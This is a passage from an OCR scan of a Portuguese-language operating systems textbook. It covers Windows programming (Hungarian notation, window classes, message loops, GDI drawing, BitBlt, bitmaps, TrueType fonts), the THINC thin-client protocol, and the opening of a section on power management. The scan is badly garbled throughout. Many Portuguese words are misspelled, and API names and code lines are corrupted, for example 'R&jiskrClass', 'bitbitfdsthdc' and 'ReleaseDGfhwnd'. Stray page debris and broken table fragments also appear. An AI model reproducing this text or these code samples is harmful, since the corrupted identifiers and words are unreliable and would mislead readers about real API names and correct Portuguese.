nha sido imcializado a partir de uma linha de comando. O 
quarto para metro, iCmdShow, informa se a janeia inidal do 
programa deveria ocupar loda a tela, parte dela ou nada da 
tela (somenie barra de tarefa). 

Essa dedaraęao ilustra uma convenęao da Microsoft 
amplamente usada, cha ma da notaęao hungara. O nonie 
e urn trocadilho com a notaęao polonesa, o sistema pós- 
fixo iiwentado pelo polones J. Lukaskwkz, espedaljsta 
cni lógica, para a rcpresentaęao de fórninlas algćbricas sem 
uso de precedenda ou paremeses, A notaęao hungara foi 
inventada por um programador hungaro da Microsoft, 
Charles Simonyi, e usa os primeiros poncos caracteres de 
urn ideiiiificador para espedJScar o lipo. Entre as letras e os 
tipcps permjtidos cstao c (caraclere), w (palavra, ncsse caso 
indicando um inieiro de 16 bits sem sinal), i (inteiro de 
32 bits com sinal) H I (longo, tanibem um inteiro de 32 bits 
com sinal), s (cadeia dc caracteres), sz (cadeia de caracteres 
terminada por um by te zero), p (ponteiro), fn (funęao) e h 
(nome). Assim, szumi e uma cadeia de caracteres termina¬ 
da cm zero e iCmdShow e um inteiro, por exemplo. Muitos 
programadores nao conskteram vantajoso codifkar assim 
o tipo nos nomes das variaveis e que isso tor na o código 
para Windows excepcioiialmcnte dificil de ler. No UNIX 
nao existe nada analog# a essa notaęao. 

Cada Janda deve ter um ohjeto-classe assodado quc dc¬ 
ii nc suas propnedades, Na Figura 535, aqude objęto--classe 
c o wndclass. Um objęto do tipo WNDCLASS tein dez cam- 
pos; ąmtio delcs sao inicializados na Figura 535, Em um 
programa real, os omros seis seriam inicializados tanibem. O 
campo mais importante e o IpfnWndProc, que e um pomeiro 
do lipo longo (32 bits) para a fuuęao que trata as mensagens 
diredonadas para essa janeia. Os otitros campos inicializados 
no excmp]o dacio dizein qnal nonie e fcone usar na barra dc 
tftulo e qual sfinbolo usar para o cursor do mouse. 

Após o wnddm ter sido inicializado, o R&jiskrClass c cha- 
mado para passado para o Windows. Particularmente após 
essa cha mada, o Windows sabe qual procedimento ciiamar 
quando ocorrem varios eventos que nao passam pda fila 
de mensagens. A cii a mada seguinte, CreateWindcw, aloca 


memória para a estru tura de dados da janeia e retorna um 
nome para referendar fum ramę n te. O programa entao rea- 
liza mais duas chamadas em ordem, para colocar o coniomo 
da janeia na tela e finał me nie precnche-la por completo. 

Chegamos entao ao laęo principal do programa, que 
coiisiste cm obter uma mensagem, fazer certas traduęóes 
para cla c, entao, passa-la dc volta para o Windows, para 
que ele irwoąue WndProc para proeessa-la. Esse mecanismo 
todo poderia ter sido mais simples? A resposia c sini mas 
ele foi fcito dessa inaneira por razócs históricas c agora cs- 
tamos atrclados a de. 

Na sequencia do programa principal esta o procedi¬ 
mento WndProc, que trata as varias mensagens que po- 
dem ser enviadas para a janeia, O uso de CALLBACK nesse 
momemo, como WINAP1 usado ameriormente, cspecifica 
a scąuencia de cha mada a usar para os parametros. O pri¬ 
ma i o parameiro e o nome da janeia a usar O segundo 
parameiro e o tipo da mensagem. O terceiro e o ą narto pa¬ 
rametros padem ser empregados para fornecer informaęao 
adidonal quando necessario* 

Os tipos de mensagens WMjOREATE e WMJ)ESTROY 
sao enviados no imcio e no finał do programa, respecti- 
vamente. Eles forneccin ao programa a oportunidade, por 
exemplo, dc alocar memória para estnituras dc dados c de- 
pois devoive-la. 

O terceiro tipo de mensagem, WM_PAINT f e uma 
instruęao para o programa prccncher a janeia. Ele nao 
e cha mado somente ąuando a janeia e deseń ha da pela 
primeira vez, mas tanibem eni mtiitas outras ocasioes 
d u ranie a execucao do programa. Em contrastc a os sis- 
temas com base em texto, no Windows um programa 
nao pode presumir que o quc for desenhado por ele na 
tela dc vtdeo pcrmanccera ncla atc su a remoęao. Ou- 
tras janelas padem ser arrastadas por ci ma de uma ja 
existcnte, rnenus pod cm ser abertos sobre cla, caixas 
de dialogos e pontas de ferramemas padem cobrir par¬ 
te dessa janeia, e assim por dianie. Quando esses itens 
sao removidos, a janeia deve ser redesenhada, O Win¬ 
dows instrui um programa a redesenliar uma janeia en- 
viando para ele uma mensagem \VM_PA!NT. Como um 
gęsto amigavd, ele tanibem fornccc informaęao sobre 
qual parte da janeia foi sobreposta, pois e mais facil 
regenerar parte da janeia cm vez de redesenba-la por 
completo, 

Existem duas maneiras de o Windows conseguir que 
um programa faęa algo, Uma e postar unia mensagem cm 
sua fila dc mensagens, Esse metodo e usado para a entrada 
do teclado, do mouse e de temporizadores expirados. A ou- 
tra mancira e cnviar unia mensagem para a janeia c cnvol- 
vc o próprio Windows, que tern de cha mar diretamente o 
WndProc, Esse metodo e usado para lodos os omros evcmos. 
Yisto quc o Windows c notificado quando uma mensagem 
e completameiue processada, de pode abster-sc de reaiizar 
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unia nova chamada ale que a anterior tenlia sido finalizada. 
Desse modo, as condięóes de corrida sao evitadas. 

Ha muitos outros tipos de mensagcns, Para cviiar um 
comportamento irrcgular com a chegada de urna mensa - 
gem inesperada, o programa pode chamar DefWindowPrcc 
no fmal do WndPm para deixar o tratador padrao cuidar 
dos outros casos. 

Em rcsumo, um programa para Windows nor ma Imen¬ 
tu cna uma ou niais janelas com nm objeto-classe para cada 
urna. Associada a cada programa existe uma fila de mensa- 
gens e um conjunto de procedimentos tratadores. Por ulti¬ 
mo, o comportamento do programa e dirigido pelos even- 
tos que cli ega m, que sao processados pelos procedimentos 
tratadores. Esse e um modelo muiio diferente do mundo 
do UNJX e contrasta com sua visao mais procedimental. 

A aęao real de desenhar para a tela e tramda por um 
pacote que omsiste cm centenas de procedimentos empa- 
coiados juntos para Eormar uma interface do dispositi- 
vo grafico [$mphks devke interface — GDI). Ela pode iraiar 
texto e todos os tipos de graficos e e projetada para ser in¬ 
dependent e de plataforma e de dispositwo. Antes que um 
programa possa desenhar (isto e, pintar) em uma janela, 
de necessita adquirir o contexto do dispositivo, que e 
uma estrutura de dados interna contendo propriedades da 
janela — como a fon te atnal, a cor do tcxto, a cor do fundo 
etc. A maioria das chamadas para a GDI usa o contexto do 
dispositivo tanto para desenhar como para obter ou aj u star 
as propriedades. 

Ha varias maneiras de adquirlr o contexto do dispositb 
vo. Um modo simples de aquisięao e uso e 

hdc = GetDC(hwnd); 

TextOut(hdc, x 1 y, p$Text, iLength); 

ReleaseDGfhwnd, hdc); 

A primeira instruęao obtem o nonie para o contexto do 
dispositivo, hdc. A segunda se utiliza do contexto do dispo- 
sitivo para escrever uma linha de texto na tela, especifkan- 
do a coordenada {x,y) de onde a cadeia inicla, um ponteiro 
para a própria cadeia e sen tamanho, A terccira libera o 
contexto do dispositivo indicando quc o programa esta dc- 
senhando naqudc moniento. Notę que o hdc e u sad o de 
maneira analoga ao descritor de arquivo do UNIX, Mole 
tambem que o RekdseDC contem informaęao redundame 
(o uso de M:especifica unicameme uma janela}* Empregar 
i n form aęao redundame sem valor real e algo comum no 
Windows. 

Uma outra obscrvaęao interessantc e que, ąuando o 
hdc ć adąuirido dessa maneira, o programa somente pode 
escrever na area de diente da janela, nao na bart a de tilnlo 
ou em outras part es dela* Interna menie, na estrutura de 
dados do comexto do dispositivo, e nia mi da uma regiao 
de pintura. Qualquer deseń ho do lado de fora dessa regiao 
e ignorado. Contudo, existe outro jeito de adquirir o eon- 
texto do dispositivo, Gel WindowDC, o qual aj u sta a regiao 


de pintura para a janela loda. Outras chamadas restringem 
a regiao de pintura de outras maneiras. A existencia de va- 
rias chamadas que fazem quase a mesma coisa e outra ca¬ 
ra ctensti ca do Windows. 

Um tratameniG completo sobre GDI esta fora de ques- 
tao aquL Para o leiior interessado, as referencias citadas 
anteriormeme fornecem informaęao adicional. Todavia, 
vale a pena dizer algo sobre a GDI, dada sua imponancia. 
A GDI faz varias chamadas de rotina para obter e devol- 
ver os contextos dos dispositivos, obter In form aęao sobre 
os contextos dos dispositivos, obter e aj usta r os atributos 
dos dispositivos {por cxcmpio, cor de fundo), manipular 
objetos GDI como canetas, pincćis e fontes, cada um dclcs, 
por sua vcz, com scus próprios atributos. Por firn, ć claro, 
existe um grandę numero de chamadas GDI para realnien¬ 
ie desenhar na tela. 

Os procedimentos graficos estao situados em quatro 
categorias; traęado de linhas e curvas, desenho de areas 
preenchidas, gerendamento dc mapas dc bits c apresenta- 
ęao dc tcxto. Ja vimos um cxcmplo dc tratamento dc tcxio; 
assim, vamos dar uma rapida olhada cm outro, A chamada 

Rectanglefhdc, xesquerda, ytopo, xdireita, ybase}; 

desenha urn reiangulo precnchido cujos venices sao (m- 
querda t ytopo) e [xdireita f ybase). Porexemplo f 

Rectanglefhdc, 2, 1,6, 4); 

desenhara o reiangulo mostrado na Figura 5*36* A largura 
e a cor da linha e a cor de preenchiniemo sao obtidas do 
contexto do dispositivo. Outras chamadas GDI sao simila- 
res a essa. 

Mapas de bits (bitmaps) 

Os procedimentos GDIs sao exemplo$ de graficos ve- 
toriais usados para colocar figuras geometricas e textos na 
tela. Bies podem ser escalados facilmente para telas maiores 
ou menores (desde que o numero de pixels na tela seja 
o mesmo). Sao tambem relaliyamente independentes de 
dispositivo. Uma coleęao de chamadas de rotinas GDI pode 
ser reunida em um arquivo capaz de descrever um desenho 



I Figura 5*36 Um exempio de retingub desenhado utiiizando 
Rectangle . Cada quadrado representa um pixel. 




















Sn*MI366 


256 Sśstemas operaaonais modernos 


completo, Esse arquivo e chamado de meta-arquivo do 
Windows e e amplamente usado para Łransmitir desenhos 
de um programa Windows para ontro. Esses arquivos tem 
uma extensao .wmf. 

Miii los programas para Windows permitem ao usuario 
copiar (parte de) uma figura e colo ca da cm uma area de 
transfer£ncia do Windows, O usuario pode entao ir para 
um outro programa e colar o conteudo da area de Iransfe- 
rencia em um outro documento. Uma maneira de realizar 
isso e fazer com que o primeiro programa represente a fi¬ 
gura como um meta-arqiiivo do Windows c coloque-o na 
area de transferencia em fermato .wmf. Existem tambem 
outros meios. 

Nem lodas as imagens que os computadores manipu- 
lam podem ser geradas a parlir de graficos vetoriais. Foto- 
grafias e vtdeos, por exempio, nao u sam graficos vetoriais, 
mas sao varridos sobrepondo-se uma grade na iinagem. Os 
valores medios emre as ceres (vermeIho, verde e azul) de 
cada ąuadrante da grade sao, entao, obtidos e salvos como 
o valor de um pixei. Esse arquivo ć chamado de mapa 
de bits (bitmaps). Existem mu i t os recursos no Windows 
para a manipulaęao do mapa de bits. 

Outro uso para os mapas dc bits e o teslo, E possivd 
represemar um delerminado caractere em alguma fonte 
usando um mapa de bits pequeno. A adięao tle texto na 
tela torna-se uma questao de mover os mapas de bits. 

Uma maneira geral dc usar os mapas dc bits e por 
mcio de uma chamada ao procediinento bithlt, icita do 
seguintc modo; 

bitbitfdsthdc, dx. dy s wid, ht, srchdc, sx, sy r rasterop); 

Em sua forma mais simples, de co pi. a um mapa de bits 
de um retangulo em uma janela para um retangulo ern 
outra janela (ou na mesina) . Os primeiros tres parametros 
especifkam a Janda do destino c sua posięao, Entao vem 
a largura e a a 1 tura. Em segiuda, a janda da origem e sua 
posięao. Noie que cada janela tern scu próprio sistema de 
coordcnada, com (0, 0) no vertice superior esąuerdo da Ja¬ 
nda, O ultimo para metro seta descrito a seguir, O efcito dc 

BitBlt(hdc2 J, 2, 5, 7, hdd, 2 P 2, SRCCOPY); 


e moslrado na Figura 5.37. Notę cuidadosameme que a 
area totaJ 5x7 da letra 'A 1 foi copiada, incluindo a cor de 
fundo. BitBlt pode fazer mais do que simplesmente copiar 
mapas de bits. O ultimo parametro da a possibilidade de 
exccutar opcraędcs booleanas para combinar o mapa de 
bits da origem c o mapa dc bits do destino. Por exemplo P 
a opcraęao lógica OU pode ser aplicada entre a origem c 
o destino para sc fundir com cle. Tambem pode ser mada 
a operaęao ou EXCLUSiVO, mamendo as caraciensticas 
tanio da origem quanto do destino. 

Um problema com os mapas dc bits e que des nao sao 
extensivcis. Um caractere que sc encontre cm uma caixa 
dc S x 12 em uma tcla dc 640 x 4S0 parć cer a razoavcl 
Contudo, sc esse mapa de bits for copiado para uma pa gi¬ 
ną impressa em L200 pontos/polcgada (dpi), a qual mede 
10.200 bits x 13,200 bits, a largu i a do caractere (8 pixds) 
sera de 8/i.200 polegadas ou 0,17 mm de largura. Alem 
disso, copiar emre dispositivos com diferentes proprieda- 
des de cores ou entre monocromatico e colorido nao pro- 
duz bons resultados. 

Por essa razao, o Windows tambem suporta uma estru - 
tura dc dados chamada de mapa de bits independente 
de disposttivo (dmce independent bitmap — DIB). Os ar- 
quivos que usam esse forma to tem a extensao .hmp. Esses 
arquivos tem cabeęalhos dc arquivo e de informaęao e uma 
tabela de cores antes dos pixe!s. Essa informaęao facilita a 
tarefa de mover mapas de biis entre dispositivos diferentes. 

Fontes 

Nas versoes arueriores ao Windows 3.1, os caracteres 
cram representados como mapas dc bits c copiados na tela 
ou na impressora usando BitBlt. O problema ttesse metodo, 
como ja dissemos, e que um mapa de bits tern sentido para 
a tcla, mas e muito pcąumo para a impressora. Alem dis- 
so, e neccssario um mapa de bits para cada caractere com 
tamanlio difercnte. Em outras palavras, dado um mapa dc 
bits para a letra A no pa dra o de dez pornos, nao ha como 
reca lenia do para o padrao de 12 pontos. Uma vez que po¬ 
dem ser necessarios todos os caracteres de todas as fontes 
para os tamanhos variando de quatro ate 120 pornos, seria 



(a) 


(b) 


l Figura 5.37 Como copiar mapas de bits usando Bitbft. (a) Antes. (b) Depois. 
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preciso urn vasto nu mero de mapas de biis. O sistema loda 
era simplesmente muito inadequado para texlos. 

A soluęao £oi introduzir as fontes TrueType, que nao 
cram mapas de bits, mas esboęos dc caractcres. Gada ca- 
ractcre TrueType e definido par urna scąuencia de pornos 
ao redor de sen perimelro. Todos os pantos sao relativos 
a origem (0, OJ. Usando esse sistema, e facil escalar os ca- 
raaeres de maneira crescente ou decrescente. Tudo a que 
se predsa la zer e multiplicar cada coordenada pelo mc sino 
fator de escala. Desse modo, urn caraetere TrueType pode 
ser escalado para dma ou para baixo para qualquer pa- 
drao de tamanho, mesmo para tamanhos frarionados. lima 
vez no tamanho correto, os pontos podem ser conectados 
empregando-se algoritmos bem conhcddos, do lipo ligue 
os pontos [foltow-the-dots), ensinado no jardim de infanda 
[notę que os jardins de infanda modernos usam superftdes 
cli nas {splines) para suavizar os rcsultados]. Após o contor- 
no ler sido condmdo, o caraetere pode ser preenchido. Um 
exemplo dc aiguns ca raaeres escalados para tres diferentes 
tamanhos cm pontos e dado na Figura 5.^8. 

Urna vez que o caraetere preenchido esta disponfrel em 
forma matematica, ele pode ser varrido, isio e, convertido 
para um mapa de biis em qualquer resoluęao que se deseja, 
Uma vez escalados e depois varridos, podemos ter cert cza de 
que os caracteres mostrados na teia e aquelcs que aparecem 
na impressora sera o tao próximos qnanto possivel, diferindo 
somente na predsa o do cno. Para melliorar a ind a mais a 
ąualidade, e possfrel adldonar dicas em cada caraetere d.i- 
zendo como efetuar a varredura. Por exeniplo, o rematc das 
pontas lalcrais no topo da letra T deveria ser identico, algo 
que pode nao ocorrer em vimide do erm de arredondamen- 
to. As dicas melhoram a aparencia finał. 
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HM Clientes magros (thin clients) 

Dura me anos, o prlncipal paradigma de computaęao 
tern osdlado entre computaęao centralizada ou descenlra- 
lizada. Os primeiros computadores, como o ENIAC, eram, 
de fato, computadores pessoais, embora grandes, pois so¬ 
mente uma pessoa podia usa-ios de cada vez< Hntao surgi- 
ram os sistemas de tempo compartilhado, nos quais muitos 
usuarios remotos em terminais simples compartilbavam 
um computador central de grandę porte. Depois, chegou a 
era do PC: os usuarios linham sens próprios computadores 
pessoais mwameme. 

O modelo descentralizado de PC tern suas vantagens, 
mas tambem algumas desvantagens graves que estao ape- 
nas comcęando a ser levadas a serio. Provavelmente, o 
maior problema e que cada PC tern um grandę disco rfgi- 
do e software complexo que predsa de manutenęao. Por 
exemplo, quando uma nova edięao do sistema operadona! 
e lanęada, e necessario um irabalho i menso para realizar a 
atualizaęao de cada maąuina separadameruc. Na maioria 
das corporaęóes, os custos da ma o de obra nesse lipo de 
manutenęao de software ultrapassam os custos dos pro- 
prios hardware e software. Para usuarios domesticos, a 
mao de obra e tecnicamcnte sem custo, mas poucas pesso- 
as sao capazes de faze-la corretamenie e pode-se dizer que 
ninguem se diverte ao faze-!a. Com um sistema centraliza- 
do, someme uma ou algumas maquinas precisam ser atua- 
! Łza das, e essas maąuinas tern um grupo de especialisias 
quc fazem o irabalho. 

Uma ąuesiao reladonada ć que os usuarios dcveriam 
fazer backups regularmente dc sens sistemas de arqiiivos 
degigabytes, maspoucos fazem isso, Quando acomcce um 


20 1»= abcdefgłi 



I Figura 5,38 Aiguns exemplos de contornos de caracteres em diferentes tamanhos de pontos. 
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imprevisto desastroso, e um desfile de gemldos e maos se 
conlorcendo. Com um sistema centralizado, os backups 
podem ser feitos loda noite por robos de fila automaticos. 

Outra vantagem e que o comparlilhamento de recursos 
e mais facil com sistemas centralizados, Um sistema com 
256 nsuarios remolos, cada um com 256 MB de RAM, tera 
a maior parte da RAM ociosa na marona do tempo. Com 
um sistema cemralizado que usa 64 GB de RAM, nao ha- 
veria a possibilidade de algum usuario predsar temporaria- 
mente de um lote de RAM e nao poder obte-lo pelo lato de 
a memória estar cm algum outro PC. O mesmo argumemo 
pode ser usado para o cspaęo de disco e outros recursos. 

Finalmente, estamos vendo unia mtgraęao da com- 
putaęao cemrada no PC para a coinputaęao cent rada na 
Web. Urna area que ja esta bem adiantada e a do e-mall. 
As pessoas cost urna vam ter su a correspondenda de tron i ca 
entregue em sua maquina para futura leitura, Hoje em dia, 
niuitos preferem se conectar ao Gmail, ao Hotmail on ao 
Yahoo para ler scus e-mails a pailir dai. Em breve, as pes¬ 
soas irao se conectar a outros sites para cditar scus tcxtos, 
construir suas pianiIhas c faza oulras coisas que costuma- 
vam demandar um software no PC. Pode ale ser qne se 
chegue ao potno no qual o unico software a ser executado 
nos computadores pessoais seja o navegador P e quem sabe 
nem ele. 

Unia condusao razoave! poderia ser dizer que a maio- 
ria dos usuarios qucr computaęao 3merativa dc alto desem- 
penho, mas nao quer de falo admiriistrar um computador. 
Isso tern levado os pesąuisadores a reexaminar o tempo 
compartilhado com terminais burros — agora chamados 
educadaniente de clientes magros {ihm dknts) — que 
atende as expectativas dos terminais modernos. O X foi um 
passo nessa dircęao, e os terminais X dcdicados foram popu- 
lares durante certo tempo, mas cafram cm desuso porque, 
embora sejarn tao caros quanto os PCs, fazem menos coisas 
c ainda prerisam dc manutcnęao dc soflwarc. O idea! seria 
um sistema computacional de alto desempenho no qual 
as maquiiias do usuario nao tivcssem software algum. O 
imeressante e que isso e posswel. A segulr descreveremos 
um dieme desse lipa, denominado THINC, desenvolvido 
pelos pesąuisadores da Universidade de Columbia (Baratto 
et a!., 2005; Kim et aL, 2006; Lai c Nich, 2006), 


A ideia basica e retirar da maquina dieme todos os pro- 
gramas e osada sonie u te como tela, com toda a coniputa- 
ęao {incluindo a constmęao do mapa de bits a ser exibido) 
sendo realizada pelo scrvidor. O protocolo entre o cliente 
e o senidor simplcsmcnte informa a tcla como atuaMzar a 
RAM de vfdeo e nada mais, Cinco comandos sao utiłizados 
na comunicaęao entre os dois lados, Eles sao listados na 
Tabela 5.6 a seguir. 

Vamos examinar os comandos, Raw e udlizado para 
transmilir dados sobre os pixels e exibi-los na tela no for- 
mato bruto. Em principio, esse e o unico comando liecessa- 
rio. Os outros sao simplesmente otimizaędes, 

Copy instrui a tela a mover dados dc urna parte da 
RAM de vfdeo para outra. E util na rolagem da tela sem 
necessidade de retransmissao de todos os dados, 

Sfill preenche unia regiao da tela com um unico valor 
dc pixd. Muitas telas possuem um fundo uniforme dc al- 
gurna cor e este comando e utilizado para, prirneiro, geraro 
fundo para que, depois dele, possani ser pintados os textos, 
fcones e outros itens. 

Pfill replica um padrao ao longo de u ma regiao. Ele 
tambem e usado para o segundo piano, mas alguns fundos 
sao um pouco mais complexos do que unia unica cor, situa- 
ęao na qual este comando entra em aęao* 

Finaltnetile, Bitmap tambem pinta urna regiao, mas 
com unia cor para o segundo piano e outra para o prirneiro 
piano. De modo geral, esses comandos sao bastante simples 
e exigem rruiito pouco do software do lado do cliente. Toda 
a complexidade envolvida na construęao dos mapas de bits 
que preenchem a tela lica a cargo do servidor. Para aiunen- 
lar a cli ci en ci a, diferenics comandos podem ser agregados 
a um tinico pacote para transmissao na rede do sereidor 
para o cliente. 

Do lado do semdor, os programas graficos usam co- 
mandos de alto ntvel para pimar a tela. Esses comandos sao 
imerceptados pelo software do THTNC e traduzidos em co¬ 
mandos quc podem ser enviados ao cliente. Para aumentar 
a didencia, e possfvel rcordenar os comandos. 

Ha estudos quc fornecem informaęocs extensas re- 
lacionadas as medidas de desempenho de servidores nos 
quais fimcionam diversas aplicaędes comuns e que estao 
distantes do cliente de 10 km a 10.000 km. No geral, o 


Comando 

Descrięao 

Raw 

Exibe dacio do pixe! bruto em determinada posięao 

Copy 

Copia a nrtemória de imagem para as coordenadas especificadas 

Sfill 

Preenche uma drea com um valor de cor de pixei 

Pfill 

Preenche uma śrea com um vabr de padrao de pixe1 . 

Bitmap 

Preenche uma area utilizando uma imagem bitmap 


I Tabela 5.6 Os comandos de ewbtęao do protocolo TH INC, 
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desempenho superou o dos sistemas das redes de longa dis- 
tancia, ate mesmo com videos em tempo real. Para maiores 
in forma ę5 es, sugerimos que leiam as pesąuisas. 


5.8 


Cerenciamento de energia 


O primeiro computador eletromco de propósito geral 
o EN1AC tinha 18 mil valvulas e consumia 140 mil wat- 
ts de potencia. Em decorrenda disso, cle fez subir minio 
as contas de eleinddade. Após a invenęao do transistor, o 
uso de energia se reduziu drasticanicntc e a mdustria dc 
computadores perdeu o mteresse nos reąuisitos de energia. 
Contudo, boje em dia o gerenciamenlo de energia esta de 
volta ao centro das atenęóes e o sistema operacional esta 
desempenbando utn importante papel. 

Yamos comeęar com os PCs de mesa. Urn PC de mesa 
muitas vezes lem um suprimento de potencia de 200 watis 
(ern geral $5 por eento eficiente, isto e, perde 15 por cento 
da energia que emra eom o aąuecimento). Śe cem milhoes 
dessas maąuinas forem ligados ao mesmo tempo ao redor 
do mundoJuntos usarao 20 mil megawatts de eletricidade. 
Essa e a sarda total de 20 usinas mideares de porte medio. 
Se as neeessidades de energia pndessem ser cortadas pela 
metadc, poderiamos nos livrar de dez usinas mideares. Do 
ponto de vista ambiental, eliminar dez usinas nuclearcs (oii 
mn nu mero equivalente de fabricas dc combusnVd fóssil) 
c urna grandę vitória c urna nobrc aspiraęao. 

A outra situaęao que envolve a energia esta ligada aos 
computadores mantidos por baterias, induindo notebooks, 
laptops, palmtops c Wcbpads. O ponto central do probiernia 
e que as baterias nao podem conter carga suficiente para 
durar muito tempo, resistindo poucas li ora s no maximo. 
Alena disso, a despeito dos esforęos macięos em pesąuisas 
pelas companhias de baterias, companhias de computado¬ 
res e empresas consumidoras de elet roni cos, o progresso 
e ba stan te lento. Para u ma industria acostumada a urna 
duplicaęao de desempenho a cada 18 meses (lei de Moo- 
rc), nao obter nenhum tipo de progresso nessa arca parcce 
unia violaęao das leis da lisica, mas essa ć a situaęao alual. 
Comeąuememente, fazercom que os computadores useni 
menos energia dc modo que as baterias existentes durem 
mais tempo e um ponto crucial na agenda de qualquer um. 
O sistema operacional desempenha urn papci importante 
aqui, como deścreveremos a seguir* 

No nfvel mais baixo, os vendedores de hardware estao 
teniando tornar sens componentes eletrónicos mais efi- 
rientes. As tecnicas utilizadas induem a reduęao do tama- 
nho dos transistores, escalonamento dinamico de tensno, 
utilizaęao dc barramentos adiahatkm e low-swing e tecnicas 
similares, Foge ao escopo desie livro trata r des te assimto, 
mas os leitores interessados podem encontrar urna boa pes- 
quisa no a i ligo de Yenkatachalam e Frań z (2005). 

Existem duas estrategias gerais para reduzir o consumo 
de energia. A primeira eonsiste em o sistema operacional 


desligar partes do computador (principalmente os disposi 
tivos de E/S) que nao estejam em uso, pois um dispositivo 
desligado usa pouca ou nenbuma energia. A scgtmda e o 
aplicatiTO usar menos energia, possivelmente degradando 
a qualidadc da experiencia do usuario, com o objetivo dc 
csticar o tempo da bateria, Vcrcmos cada unia dessas abor- 
dagens cm scquencia, mas primeiro conheceremos o projc- 
Lo de hardware com respeito ao uso de energia. 

5.8.11 Questóes de hardware 

As baterias sao de dois lipos: descartaveis e recarre- 
gaveis. As baterias descartaveis (mais comumente os ti- 
pos AA A, AA e D) podem ser usadas para executar dis- 
positivos de mao f mas nao tem energia suficiente para 
alimemar um laptop com grand es telas brilbames. U ma 
bateria recarregaveL ao contrario, pode armazenar bas- 
tante energia para alimentar um laptop durante algu- 
mas ho ras, As baterias dc nfąuel cadmio domina vam ate 
pouco tempo atras; entretanto, abriram caminho para 
as baterias hibridas de metal nfąuel que resistem mais 
tempo e nao poluem tamo o ambiente quando sao des- 
cariadas. As baterias dc fon lilio sao ainda mdhores c 
podem ser recarregadas sem que sejani esvaziadas pri- 
mciro, mas sua caparidade tambem e bastante li mi ta da, 

A abordagem geral que a maioria dos vendedores de 
computadores tisa para a conservaęao da bateria e projetar 
CPU, memória e dispositivos de E/S com diversas possibi- 
lidades de estado: bgado, dormindo, hibernando e desliga¬ 
do, Para usar o dispositivo, ele deve estar ligado. Quando 
o dispositivo nao for mais netessario durante um pequeno 
intervalo de tempo, ele pode ser colocado para dormin o 
que reduz o consumo dc energia. Quando sc espera quc 
o disposilivo nao seja nccessario durante um longo perio- 
do de tempo, de pode hibemar, red uzi ndo o consumo de 
energia ainda mais. A discussao nesse caso e que, para lirar 
o disposuivo do esiado dc bibernaęao, muitas vczes gastam- 
-se mais tempo e energia do que para tira-lo do estado de 
dormenda. Por fim, ąuando o dispositivo esta desligado, 
ele nao faz nada e nao consomc nenbuma energia. Nem 
todos os dispositivos tem todos esses estados, mas, quando 
os tem, o sistema operacional esta pronto para gerenciar as 
transięoes dos estados nos momentos corretos. 

Alguns computadores tem dois ou mesmo tres botoes 
de energia, Um deles pode colocar o computador todo em 
estado de dormencia, do qual ele pode ser acordado ra- 
pidamente por meio do acionamcnto dc uma reda ou dc 
uma movimentaęao no mouse. Outro bota o pode colocar 
o computador em estado dc hibcrnaęao, do qual de levara 
tiiuito mais tempo para ser acordado. Em ambos os casos, 
esses botoes geral menie nao fazem nada, exceto enviar um 
sinal para o sistema operacional, que se encarrega do res¬ 
tante em software. Em alguns pafses, os disposithos ele- 
tricos devem, por lei, ter uma chave mecanica de energia 
que interrompa um drcuito e inipeęa a energizaęao do dis- 
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positivo, por razoes de seguranęa. Para obedecer a essa lei, 
ouira chave pode ser adirionada. 

O gerenciamento de energia iraz a tona ąuestdes com 
<is ąuais o sistema operacional tein de lidar. Muitos siste- 
mas lidam com o rccurso da hibernaęao desligando scus 
dispositivos seletiva ou lemporariamente, on pelo menos 
rednzindo sen poder de consumo quando estao ociosos. As 
ąuestoes que devem ser respondidas indnem: Quais dispo- 
sitivos podem ser controlados? Eles rem apenas os estados 
ligado/desligado, ou tambem possucm estados intermedia- 
rios? Quanla energia e economizada nos estados de baixo 
consumo de energia? Ha consumo de energia para rei ni- 
cializ.ar o disposilivo? Algum contexto tern cle ser salvo 
ąuando o sistema passa para o estado de haixo consumo 
de energia? Quanto tempo leva para voltar a poiencia to- 
lal? Naturalmenic, as respostas a essas pcrguntas variam de 
disposilivo para disposilWo, de modo que o sistema opera- 
donal precisa ser capaz de lidar com unia ampla faixa de 
possibilidadcs. 

Yarios pesquisadores tern examinado os laptops para 
ver em que porno a energia se esgota. Li et al. (1994) medi- 
ram varias cargas de traballio e chegaram a condusao mos- 
trada na Tabela 5.7, Lorch e Smith (1998) fi zera m medięoes 
em outras maąuinas e obtiveram as condusóes tambem 
mostradas na Tabela 5J, Wdseret al. (1994) tambem rea- 
lizaram medięóes, mas na o pubiicaram valores numericos; 
sini pleśnienie determinaram que os tres maiorcs consumi- 
dorcs de energia foram a tela, o disco rfgido c a CPU, ncssa 
ordę no Enąuanto esses niimeros nao sao minio cquivalcn- 
tes entre si — pravavdmeme porąue as diferenies marcas 
dos compuiadores examinados tern na verdade diferenies 
necessidades de energia — f parece claro que a tela, o disco 
rfgido e a CPU sao alvos óbvios para a economia de energia. 

_ 5.8.21 Questoes do sistema operacional 

O sistema operacional desempenha um imponante 
papel no gerenciamento de energia. Ele com rola todos os 
dispositivos, de modo que e cle quem dcvc deridir o que 
desligar c ąuando faze-to. Se ele desliga u ni dispositivo e 


Dispositivo 

Li et al. (1994) 

Lorch e Smith (1998) 

Tela 

68% 

39% 

CPU 

12% 

18% 

Disco rig ido 

20% 

12% 

Modem 


6% 

Som 


2% 

Memória 

0,5% 

1% 

Outros 


22% 


Tabela 5.7 Consumo de energia de diferenies partes de um 
laptop. 


este e iniediatamente necessario de novo P podera haver um 
atraso inoportuno ate que ele seja reinicializado. Por outro 
lado P se ele espera muito tempo para desligar um dispositi- 
vo, a energia c dcsperdięada por nada. 

O truąue e encontrar algoritmos e heurfsticas que per- 
mi tam a o sistema operacional tom ar boas dęci s o es sobre 
o que desligar e ąuando. O problenia e que o conceito de 
'boas' e altamente subjetivo. Um usuario pode achar acei- 
tavel que, após 30 segundos de nenhum uso do compu- 
tador, ele leve dois segundos para responder a unia teda 
pressionada. Outro usuario pode ficnr irritado sob as mes- 
mas condiędcs. Ma ausenda da cntrada de audio, o compti- 
tador nao pode distinguir entre csses u su a rios. 

Monitor 

Vamos en la o estudar os gran des consumidores de 
energia para ver o que pode ser feito em rdaęao a cada u nu 
O i leni que mais gasta energia do oręamemo de qualquer 
um e o monitor. Para obter u ma imagom mtida e clara, sua 
ilu mi naęao devc ser sempre reanimada, e isso d emanda 
urna energia substancja]. Muitos sistemas operacionais len¬ 
ta m economizar energia desligando o moniior sempre que 
nao houvcr nenhuma aimdade d u ranie um certo nu mero 
de mi nu tos. Muiias vezes o usuario pode decidir quai sera 
o intervalo de tempo para o desliga men to, o que empurra 
